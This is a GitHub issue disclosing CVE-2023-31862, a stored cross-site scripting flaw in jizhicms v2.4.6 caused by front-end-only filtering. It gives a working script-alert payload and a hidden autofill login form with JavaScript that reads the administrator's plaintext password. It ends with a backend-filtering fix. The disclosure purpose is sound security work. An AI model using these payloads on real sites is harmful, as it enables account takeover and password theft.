Headline
CVE-2023-31862: jizhicms v2.4.6 has a XSS vulnerability in the post article · Issue #86 · Cherry-toto/jizhicms
jizhicms v2.4.6 is vulnerable to Cross Site Scripting (XSS). The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package.
The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package. However, the backend administrator clicking on the article preview will launch this malicious JavaScript script
When submitting, you can see that the post request sent is:
Modify the submitted content to:
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert(‘xss’)%3C%2Fscript%3E
At this point, if the administrator previews the submitted article, a pop-up window will appear
At this point, it indicates that the embedded JavaScript script has been maliciously executed
I know that the entire system’s cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser’s “automatic password filling” function, then the attacker can construct the following JavaScript script to obtain the administrator’s plaintext password:
<p>test</p>
<form method="post" class="layui-form" onsubmit="return false;" hidden>
<input name="cache" id="cache" type="hidden" value="" />
<select name="lang" lay-filter="lang">
<option value="">选择语言</option>
<option selected value="zh_cn">中文简体</option>
<option value="zh_cht">中文繁体</option>
</select>
<hr class="hr15">
<input name="username" placeholder="用户名" type="text" lay-verify="required" class="layui-input" >
<hr class="hr15">
<input name="password" lay-verify="required" placeholder="密码" type="password" class="layui-input">
<hr class="hr15">
<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
<hr class="hr20" >
</form>
<script>
setTimeout(function() {
const password = document.getElementsByName('password')[0].value;
alert(`the password is:${password}`);
}, 5000);
</script>
Submit the script after URL encoding
Administrator clicks on preview:
Here, the password plaintext has been pop-up displayed through the JavaScript script. If the pop-up function is modified to send the password plaintext to the attacker’s server, the attacker will successfully obtain the administrator’s plaintext password without the administrator’s awareness
Modification suggestions:
Please filter the content of the article on the backend